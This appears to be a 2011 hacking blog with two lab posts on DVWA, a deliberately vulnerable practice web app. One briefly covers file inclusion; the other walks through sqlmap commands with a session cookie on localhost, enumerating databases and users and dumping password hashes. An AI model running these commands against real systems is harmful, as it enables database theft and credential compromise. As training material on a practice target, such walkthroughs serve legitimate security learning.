October 27, 2011

File Inclusion attack on DVWA

Hey, I am not going to write much about this vulnerability. Its pretty straight forward.
The web developer has provided you the ability to include any file from the local system or even remote system. So you can be creative and include any file you want to own the system.

After watching the video, try this URL just to get the perspective:


Now, think as devilish as you can and see what else you can do with this hole ;)
Also, take a look at this exploit already present in the Metasploit framework.


October 19, 2011

Owning DVWA SQLi with sqlmap

Here we go... finally writing this post on SQL injection on DVWA. I was caught up with some really boring office -day job- work and  some other things to top that. But that has always  been  the case with my blogging. Its a sad story.

In this post I will explain the exploitation of SQL injection vulnerability present in DVWA. For details on DVWA and how to get it, please visit my previous post.

sqlmap is an automatic SQL injection and database takeover tool. SQLMAP is capable of enumerating entire remote databases, and perform an active database fingerprinting.
Get sqlmap from : http://sqlmap.sourceforge.net/

I am documenting steps that I carried out to pwn the DVWA. You are free to experiment with different options and parameters of sqlmap, it is a great tool.

Looking for SQL injection in the webapp:
The best way to detect SQL injection in a webapp is by looking into the URL of it. If you are able to change the parameters passed in the URL and that change is reflected in the output of the webapp, you can say that the parameter is being passed to the database at the backed. You will then need to verify if this indeed allows you to inject SQL in it.
URL for the DVWA SQLi page is: 

After we enter a value (e.g. 1) in the text box, result is displayed on the page and the url of the page becomes:

We can see that, after changing the value for parameter in the URL, different results are obtained.
Now, lets check whether this page is vulnerable to SQLi using sqlmap.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

This command can be used to test standalone web pages for SQLi, but in our case, because we are testing a page behind a login page, we are redirected to login.php page as we are not authenticated. To avoid this, we can use --cookie flag of sqlmap.
We need to provide value of cookie set after we have logged in to DVWA. Cookie value can be found out using tools like Burp Suite, Web Scarab etc.

After finding out cookie value, issue following command:

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --dbs

The --dbs flag lists database names if SQLi is successful.

sqlmap returns with goodies :)

available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

We will then try to enumerate tables in one of the databases. 
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" -D dvwa --tables
And we are not disappointed... :)

Database: dvwa

[2 tables]
| guestbook |
| users         |

You can continue to enumerate the target with rich set of functionality provided by sqlmap. I will show you the mettle of sqlmap straightaway ;)

We can view who is the current user:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --current-user
current user:    'root@localhost'

or all list database users:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@''
[*] 'root'@'dojo-desktop'
[*] 'root'@'localhost'

Now that you have users list, you will want to know their passwords as well. That is why sqlmap provides us with --passwords flag ;)

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users --passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *3F436344A61D99410B1DD47F05788FD5DD72E483
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Crack these hashes and enjoy ;)